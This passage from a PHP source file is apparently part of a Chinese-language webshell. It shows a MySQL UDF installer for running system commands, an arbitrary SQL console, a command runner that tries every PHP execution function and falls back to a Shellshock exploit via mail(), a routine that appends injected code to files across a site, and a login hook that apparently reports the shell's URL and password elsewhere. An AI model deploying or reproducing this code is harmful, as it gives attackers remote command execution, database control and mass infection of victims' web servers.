1214 if(@mysql_query($query,$conn))
1215 {
1216 $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
1217 if(@mysql_query($query,$conn))
1218 {
1219 $ap = explode('/', $mpath); $inpath = array_pop($ap);
1220 $query = 'Create Function sys_eval returns string soname \''.$inpath.'\';';
1221 $MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败'.mysql_error();
1222 }
1223 else $MSG_BOX = '导出DLL文件失败'.mysql_error();
1224 }
1225 else $MSG_BOX = '写入临时表失败';
1226 @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
1227 }
1228 else $MSG_BOX = '创建临时表失败';
1229 }
1230 if(!empty($_POST['runcmd']))
1231 {
1232 $query = 'select sys_eval("'.$sqlcmd.'");';
1233 $result = @mysql_query($query,$conn);
1234 if($result)
1235 {
1236 $k = 0; $info = NULL;
1237 while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
1238 $info = $infotmp;
1239 $MSG_BOX = '执行成功';
1240 }
1241 else $MSG_BOX = '执行失败';
1242 }
1243 }
1244 else $MSG_BOX = '连接MYSQL失败';
1245 }
1246print<<<END
1247<form id="mform" method="POST">
1248<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
1249<center><div class="actall">
1250地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
1251端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
1252用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
1253密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
1254库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
1255</div><div class="actall">
1256加载路径(自动获取) <input type="text" id='dlllj' name="mpath" value="{$mpath}" style="width:500px">
125764位MYSQL <input type="checkbox" onclick="document.getElementById('dlllj').value='';" name="mysql64" value="1" {$mysql64} />
1258<input type="submit" name="outdll" value="安装DLL" style="width:80px;"></div>
1259<div class="actall">支持高版本MYSQL <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:635px;">
1260<input type="submit" name="runcmd" value="执行" style="width:80px;">
1261<br />
1262<pre>
1263<textarea style="width:720px;height:300px;">{$info}</textarea>
1264</pre>
1265</div></center>
1266</form>
1267END;
1268 break;
1269
1270
1271 case "mysql_exec":
1272 if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
1273 {
1274 if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
1275 {
1276 $cookietime = time() + 24 * 3600;
1277 setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
1278 setcookie('m_eanverport',$_POST['mport'],$cookietime);
1279 setcookie('m_eanveruser',$_POST['muser'],$cookietime);
1280 setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
1281 die('正在登录,请稍候...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
1282 }
1283 }
1284print<<<END
1285<form method="POST" name="oform" id="oform">
1286<div class="actall">地址 <input type="text" name="mhost" value="localhost" style="width:300px"></div>
1287<div class="actall">端口 <input type="text" name="mport" value="3306" style="width:300px"></div>
1288<div class="actall">用户 <input type="text" name="muser" value="root" style="width:300px"></div>
1289<div class="actall">密码 <input type="text" name="mpass" value="" style="width:300px"></div>
1290<div class="actall"><input type="submit" value="登录" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>
1291</form>
1292END;
1293break;
1294
1295case "mysql_msg":
1296 $conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
1297 if($conn)
1298 {
1299print<<<END
1300<script language="javascript">
1301function Delok(msg,gourl)
1302{
1303 smsg = "确定要删除[" + unescape(msg) + "]吗?";
1304 if(confirm(smsg)){window.location = gourl;}
1305 window.location = gourl;
1306}
1307function Createok(ac)
1308{
1309 if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
1310 if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
1311 if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
1312 return false;
1313}
1314END;
1315html_base();
1316print<<<END
1317function SubmitUrl(){
1318 document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);
1319 document.getElementById('gform').submit();
1320}
1321</script>
1322END;
1323 $BOOL = false;
1324 $MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].' 地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' 版本:';
1325 $k = 0;
1326 $result = @mysql_query('select version();',$conn);
1327 while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
1328 echo '<div class="actall"> 数据库:';
1329 $result = mysql_query("SHOW DATABASES",$conn);
1330 while($db = mysql_fetch_array($result)){echo ' [<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
1331 echo '</div>';
1332 if(isset($_GET['db']))
1333 {
1334 mysql_select_db($_GET['db'],$conn);
1335 $_POST['nsql']=base64_decode($_POST['nsql']);
1336 if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();}
1337 if(is_array($_POST['insql']))
1338 {
1339 $query = 'INSERT INTO '.$_GET['table'].' (';
1340 foreach($_POST['insql'] as $var => $key)
1341 {
1342 $querya .= $var.',';
1343 $queryb .= '\''.addslashes($key).'\',';
1344 }
1345 $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
1346 $MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error();
1347 }
1348 if(is_array($_POST['upsql']))
1349 {
1350 $query = 'UPDATE '.$_GET['table'].' SET ';
1351 foreach($_POST['upsql'] as $var => $key)
1352 {
1353 $queryb .= $var.'=\''.addslashes($key).'\',';
1354 }
1355 $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
1356 $MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error();
1357 }
1358 if(isset($_GET['del']))
1359 {
1360 $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
1361 $good = mysql_fetch_assoc($result);
1362 $query = 'DELETE FROM '.$_GET['table'].' WHERE ';
1363 foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
1364 $where = $query.substr($queryc, 0, -4).';';
1365 $MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error();
1366 }
1367 $action = '?eanver=mysql_msg&db='.$_GET['db'];
1368 if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();}
1369 if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
1370 if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
1371 echo '<div class="actall"><form method="POST" action="'.$action.'" name="gform" id="gform">';
1372 echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
1373 echo '<input type="button" name="querysql" value="执行" onclick="SubmitUrl();" style="width:60px;height:49px;">';
1374 echo '<input type="button" value="创建表" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
1375 echo '<input type="button" value="创建库" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
1376 echo '<input type="button" value="删除库" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
1377 echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
1378 if(isset($_GET['table']))
1379 {
1380 echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
1381 echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'">插入</a>]</div>';
1382 if(isset($_GET['edit']))
1383 {
1384 if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
1385 echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';
1386 $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
1387 $good = mysql_fetch_assoc($result);
1388 $u = 0;
1389 foreach($good as $var => $key)
1390 {
1391 $queryc .= $var.'=\''.$key.'\' AND ';
1392 $type = @mysql_field_type($result, $u);
1393 $len = @mysql_field_len($result, $u);
1394 echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
1395 $u++;
1396 }
1397 $where = 'WHERE '.substr($queryc, 0, -4);
1398 echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
1399 echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
1400 }
1401 else
1402 {
1403 $query = 'SHOW COLUMNS FROM '.$_GET['table'];
1404 $result = mysql_query($query,$conn);
1405 $fields = array();
1406 $pagesize=20;
1407 $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
1408 $numrows=$row_num;
1409 $pages=intval($numrows/$pagesize);
1410 if ($numrows%$pagesize) $pages++;
1411 $offset=$pagesize*($page - 1);
1412 $page=$_GET['p'];
1413 if(!$page) $page=1;
1414
1415 if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
1416 echo '<table border="0"><tr>';
1417 echo '<td class="toptd" style="width:70px;" nowrap>操作</td>';
1418 while($row = @mysql_fetch_assoc($result))
1419 {
1420 array_push($fields,$row['Field']);
1421 echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
1422 }
1423 echo '</tr>';
1424 if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
1425 $result = mysql_query($query,$conn);
1426 $v = $p;
1427 while($text = @mysql_fetch_assoc($result))
1428 {
1429 echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> 修改 </a> ';
1430 echo '<a href="#" onclick="Delok(\'它\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> 删除 </a></td>';
1431 foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
1432 echo '</tr>'."\r\n";$v++;
1433 }
1434 echo '</table><div class="actall">';
1435 $pagep=$page-1;
1436 $pagen=$page+1;
1437 echo "共有 ".$row_num." 条记录 ";
1438 if($pagep>0) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'>首页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'>上一页</a> "; else $pagenav.=" 上一页 ";
1439 if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'>下一页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'>尾页</a>"; else $pagenav.=" 下一页 ";
1440 $pagenav.=" 第 [".$page."/".$pages."] 页 跳到<input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />页";
1441 echo $pagenav;
1442 echo '</div>';
1443 }
1444 }
1445 elseif(isset($_GET['insert']))
1446 {
1447 echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
1448 $result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
1449 $fieldnum = @mysql_num_fields($result);
1450 echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
1451 for($i = 0;$i < $fieldnum;$i++)
1452 {
1453 $name = @mysql_field_name($result, $i);
1454 $type = @mysql_field_type($result, $i);
1455 $len = @mysql_field_len($result, $i);
1456 echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
1457 }
1458 echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
1459 }
1460 else
1461 {
1462 $query = 'SHOW TABLE STATUS';
1463 $status = @mysql_query($query,$conn);
1464 while($statu = @mysql_fetch_array($status))
1465 {
1466 $statusize[] = $statu['Data_length'];
1467 $statucoll[] = $statu['Collation'];
1468 }
1469 $query = 'SHOW TABLES FROM '.$_GET['db'].';';
1470 echo '</div><table border="0"><tr>';
1471 echo '<td class="toptd" style="width:550px;"> 表名 </td>';
1472 echo '<td class="toptd" style="width:80px;"> 操作 </td>';
1473 echo '<td class="toptd" style="width:130px;"> 字符集 </td>';
1474 echo '<td class="toptd" style="width:70px;"> 大小 </td></tr>';
1475 $result = @mysql_query($query,$conn);
1476 $k = 0;
1477 while($table = mysql_fetch_row($result))
1478 {
1479 $charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
1480 echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
1481 echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"> 插入 </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> 删除 </a></td>';
1482 echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
1483 $k++;
1484 }
1485 echo '</table>';
1486 }
1487 }
1488 }
1489 else die('连接MYSQL失败,请重新登录.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
1490 if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
1491break;
1492
1493
1494 default: html_main($path,$shellname); break;
1495}
1496css_foot();
1497
1498/*---doing---*/
1499
1500function do_write($file,$t,$text)
1501{
1502 $key = true;
1503 $handle = @fopen($file,$t);
1504 if(!@fwrite($handle,$text))
1505 {
1506 @chmod($file,0666);
1507 $key = @fwrite($handle,$text) ? true : false;
1508 }
1509 @fclose($handle);
1510 return $key;
1511}
1512
1513function do_show($filepath){
1514 $show = array();
1515 $dir = dir($filepath);
1516 while($file = $dir->read()){
1517 if($file == '.' or $file == '..') continue;
1518 $files = str_path($filepath.'/'.$file);
1519 $show[] = $files;
1520 }
1521 $dir->close();
1522 return $show;
1523}
1524
1525function do_deltree($deldir){
1526 $showfile = do_show($deldir);
1527 foreach($showfile as $del){
1528 if(is_dir($del)){
1529 if(!do_deltree($del)) return false;
1530 }elseif(!is_dir($del)){
1531 @chmod($del,0777);
1532 if(!@unlink($del)) return false;
1533 }
1534 }
1535 @chmod($deldir,0777);
1536 if(!@rmdir($deldir)) return false;
1537 return true;
1538}
1539
1540function do_showsql($query,$conn){
1541 $result = @mysql_query($query,$conn);
1542 html_n('<br><br><textarea cols="70" rows="15">');
1543 while($row = @mysql_fetch_array($result)){
1544 for($i=0;$i < @mysql_num_fields($result);$i++){
1545 html_n(htmlspecialchars($row[$i]));
1546 }
1547 }
1548 html_n('</textarea>');
1549}
1550
1551function hmlogin($xiao=1){
1552$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
1553$serverp = postpass;
1554if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}
1555}
1556
1557function do_down($fd){
1558 if(!@file_exists($fd)) msg('下载文件不存在');
1559 $fileinfo = pathinfo($fd);
1560 header('Content-type: application/x-'.$fileinfo['extension']);
1561 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
1562 header('Content-Length: '.filesize($fd));
1563 @readfile($fd);
1564 exit;
1565}
1566
1567function do_download($filecode,$file){
1568 header("Content-type: application/unknown");
1569 header('Accept-Ranges: bytes');
1570 header("Content-length: ".strlen($filecode));
1571 header("Content-disposition: attachment; filename=".$file.";");
1572 echo $filecode;
1573 exit;
1574}
1575
1576function TestUtf8($text)
1577{if(strlen($text) < 3) return false;
1578$lastch = 0;
1579$begin = 0;
1580$BOM = true;
1581$BOMchs = array(0xEF, 0xBB, 0xBF);
1582$good = 0;
1583$bad = 0;
1584$notAscii = 0;
1585for($i=0; $i < strlen($text); $i++)
1586{$ch = ord($text[$i]);
1587if($begin < 3)
1588{ $BOM = ($BOMchs[$begin]==$ch);
1589$begin += 1;
1590continue; }
1591if($begin==4 && $BOM) break;
1592if($ch >= 0x80 ) $notAscii++;
1593if( ($ch&0xC0) == 0x80 )
1594{if( ($lastch&0xC0) == 0xC0 )
1595{$good += 1;}
1596else if( ($lastch&0x80) == 0 )
1597{$bad += 1; }}
1598else if( ($lastch&0xC0) == 0xC0 )
1599{$bad += 1;}
1600$lastch = $ch;}
1601if($begin == 4 && $BOM)
1602{return 2;}
1603else if($notAscii==0)
1604{return 1;}
1605else if ($good >= $bad )
1606{return 2;}
1607else
1608{return 0;}}
1609
1610function File_Str($string)
1611{
1612 return str_replace('//','/',str_replace('\\','/',$string));
1613}
1614
1615function File_Write($filename,$filecode,$filemode)
1616{
1617 $key = true;
1618 $handle = @fopen($filename,$filemode);
1619 if(!@fwrite($handle,$filecode))
1620 {
1621 @chmod($filename,0666);
1622 $key = @fwrite($handle,$filecode) ? true : false;
1623 }
1624 @fclose($handle);
1625 return $key;
1626}
1627
1628function Exec_Run($cmd)
1629{
1630 $res = '';
1631 if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
1632 elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
1633 elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
1634 elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
1635 elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
1636 elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}
1637 elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}
1638 elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}
1639 return $res;
1640}
1641
1642function File_Mode()
1643{
1644 $RealPath = realpath('./');
1645 $SelfPath = $_SERVER['PHP_SELF'];
1646 $SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
1647 return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
1648}
1649
1650function GetFileOwner($File) {
1651 if(PATH_SEPARATOR==':'){
1652 if(function_exists('posix_getpwuid')) {
1653 $File = posix_getpwuid(fileowner($File));
1654 }
1655 return $File['name'];
1656 }
1657}
1658
1659function GetFileGroup($File) {
1660 if(PATH_SEPARATOR==':'){
1661 if(function_exists('posix_getgrgid')) {
1662 $File = posix_getgrgid(filegroup($File));
1663 }
1664 return $File['name'];
1665 }
1666}
1667
1668function File_Size($size)
1669{
1670 $kb = 1024;
1671 $mb = 1024 * $kb;
1672 $gb = 1024 * $mb;
1673 $tb = 1024 * $gb;
1674 if($size < $kb)
1675 {
1676 return $size." B";
1677 }
1678 else if($size < $mb)
1679 {
1680 return round($size/$kb,2)." K";
1681 }
1682 else if($size < $gb)
1683 {
1684 return round($size/$mb,2)." M";
1685 }
1686 else if($size < $tb)
1687 {
1688 return round($size/$gb,2)." G";
1689 }
1690 else
1691 {
1692 return round($size/$tb,2)." T";
1693 }
1694 }
1695
1696function File_Read($filename)
1697{
1698 $handle = @fopen($filename,"rb");
1699 $filecode = @fread($handle,@filesize($filename));
1700 @fclose($handle);
1701 return $filecode;
1702}
1703
1704function array_iconv($data, $output = 'utf-8') {
1705 $encode_arr = array('UTF-8','ASCII','GBK','GB2312','BIG5','JIS','eucjp-win','sjis-win','EUC-JP');
1706 $encoded = mb_detect_encoding($data, $encode_arr);
1707
1708 if (!is_array($data)) {
1709 return mb_convert_encoding($data, $output, $encoded);
1710 }
1711 else {
1712 foreach ($data as $key=>$val) {
1713 $key = array_iconv($key, $output);
1714 if(is_array($val)) {
1715 $data[$key] = array_iconv($val, $output);
1716 } else {
1717 $data[$key] = mb_convert_encoding($data, $output, $encoded);
1718 }
1719 }
1720 return $data;
1721 }
1722}
1723
1724function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
1725function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
1726
1727function do_phpfun($cmd,$fun) {
1728 $res = '';
1729 switch($fun){
1730 case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
1731 case "shell_exec": $res = @shell_exec($cmd); break;
1732 case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
1733 case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
1734 case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break;
1735 }
1736 return $res;
1737}
1738
1739
1740
1741
1742
1743function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
1744 $show = do_show($dir);
1745 foreach($show as $files){
1746 if(is_dir($files) && $bool){
1747 do_passreturn($files,$code,$type,$bool,$filetype,$shell);
1748 }else{
1749 if($files == $shell) continue;
1750 switch($type){
1751 case "guama":
1752 if(debug($files,$filetype)){
1753 do_write($files,"ab","\n".$code) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
1754 }
1755 break;
1756 case "qingma":
1757 $filecode = @file_get_contents($files);
1758 if(stristr($filecode,$code)){
1759 $newcode = str_replace($code,'',$filecode);
1760 do_write($files,"wb",$newcode) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
1761 }
1762 break;
1763 case "tihuan":
1764 $filecode = @file_get_contents($files);
1765 if(stristr($filecode,$code)){
1766 $newcode = str_replace($code,$filetype,$filecode);
1767 do_write($files,"wb",$newcode) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
1768 }
1769 break;
1770 case "scanfile":
1771 $file = explode('/',$files);
1772 if(stristr($file[count($file)-1],$code)){
1773 html_a("?eanver=editr&p=$files",$files);
1774 echo '<br>';
1775 }
1776 break;
1777 case "scancode":
1778 $filecode = @file_get_contents($files);
1779 if(stristr($filecode,$code)){
1780 html_a("?eanver=editr&p=$files",$files);
1781 echo '<br>';
1782 }
1783 break;
1784 case "scanphp":
1785 $fileinfo = pathinfo($files);
1786 if($fileinfo['extension'] == $code){
1787 $filecode = @file_get_contents($files);
1788 if(muma($filecode,$code)){
1789 html_a("?eanver=editr&p=".urlencode($files),"编辑");
1790 html_a("?eanver=del&p=".urlencode($files),"删除");
1791 echo $files.'<br>';
1792 }
1793 }
1794 break;
1795 }
1796 }
1797 }
1798}
1799
1800
1801class PHPzip{
1802
1803 var $file_count = 0 ;
1804 var $datastr_len = 0;
1805 var $dirstr_len = 0;
1806 var $filedata = '';
1807 var $gzfilename;
1808 var $fp;
1809 var $dirstr='';
1810
1811 function unix2DosTime($unixtime = 0) {
1812 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1813
1814 if ($timearray['year'] < 1980) {
1815 $timearray['year'] = 1980;
1816 $timearray['mon'] = 1;
1817 $timearray['mday'] = 1;
1818 $timearray['hours'] = 0;
1819 $timearray['minutes'] = 0;
1820 $timearray['seconds'] = 0;
1821 }
1822
1823 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
1824 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1825 }
1826
1827 function startfile($path = "web.zip"){
1828 $this->gzfilename=$path;
1829 $mypathdir=array();
1830 do{
1831 $mypathdir[] = $path = dirname($path);
1832 }while($path != '.');
1833 @end($mypathdir);
1834 do{
1835 $path = @current($mypathdir);
1836 @mkdir($path);
1837 }while(@prev($mypathdir));
1838
1839 if($this->fp=@fopen($this->gzfilename,"w")){
1840 return true;
1841 }
1842 return false;
1843 }
1844
1845 function addfile($data, $name){
1846 $name = str_replace('\\', '/', $name);
1847
1848 if(strrchr($name,'/')=='/') return $this->adddir($name);
1849
1850 $dtime = dechex($this->unix2DosTime());
1851 $hexdtime = '\x' . $dtime[6] . $dtime[7]
1852 . '\x' . $dtime[4] . $dtime[5]
1853 . '\x' . $dtime[2] . $dtime[3]
1854 . '\x' . $dtime[0] . $dtime[1];
1855 eval('$hexdtime = "' . $hexdtime . '";');
1856
1857 $unc_len = strlen($data);
1858 $crc = crc32($data);
1859 $zdata = gzcompress($data);
1860 $c_len = strlen($zdata);
1861 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1862
1863 $datastr = "\x50\x4b\x03\x04";
1864 $datastr .= "\x14\x00";
1865 $datastr .= "\x00\x00";
1866 $datastr .= "\x08\x00";
1867 $datastr .= $hexdtime;
1868 $datastr .= pack('V', $crc);
1869 $datastr .= pack('V', $c_len);
1870 $datastr .= pack('V', $unc_len);
1871 $datastr .= pack('v', strlen($name));
1872 $datastr .= pack('v', 0);
1873 $datastr .= $name;
1874 $datastr .= $zdata;
1875 $datastr .= pack('V', $crc);
1876 $datastr .= pack('V', $c_len);
1877 $datastr .= pack('V', $unc_len);
1878
1879
1880 fwrite($this->fp,$datastr);
1881 $my_datastr_len = strlen($datastr);
1882 unset($datastr);
1883
1884 $dirstr = "\x50\x4b\x01\x02";
1885 $dirstr .= "\x00\x00";
1886 $dirstr .= "\x14\x00";
1887 $dirstr .= "\x00\x00";
1888 $dirstr .= "\x08\x00";
1889 $dirstr .= $hexdtime;
1890 $dirstr .= pack('V', $crc);
1891 $dirstr .= pack('V', $c_len);
1892 $dirstr .= pack('V', $unc_len);
1893 $dirstr .= pack('v', strlen($name) );
1894 $dirstr .= pack('v', 0 );
1895 $dirstr .= pack('v', 0 );
1896 $dirstr .= pack('v', 0 );
1897 $dirstr .= pack('v', 0 );
1898 $dirstr .= pack('V', 32 );
1899 $dirstr .= pack('V',$this->datastr_len );
1900 $dirstr .= $name;
1901
1902 $this->dirstr .= $dirstr;
1903
1904 $this -> file_count ++;
1905 $this -> dirstr_len += strlen($dirstr);
1906 $this -> datastr_len += $my_datastr_len;
1907 }
1908
1909 function adddir($name){
1910 $name = str_replace("\\", "/", $name);
1911 $datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
1912
1913 $datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
1914 $datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
1915
1916 fwrite($this->fp,$datastr);
1917 $my_datastr_len = strlen($datastr);
1918 unset($datastr);
1919
1920 $dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
1921 $dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
1922 $dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
1923 $dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;
1924
1925 $this->dirstr .= $dirstr;
1926
1927 $this -> file_count ++;
1928 $this -> dirstr_len += strlen($dirstr);
1929 $this -> datastr_len += $my_datastr_len;
1930 }
1931
1932
1933 function createfile(){
1934 $endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
1935 pack('v', $this -> file_count) .
1936 pack('v', $this -> file_count) .
1937 pack('V', $this -> dirstr_len) .
1938 pack('V', $this -> datastr_len) .
1939 "\x00\x00";
1940
1941 fwrite($this->fp,$this->dirstr.$endstr);
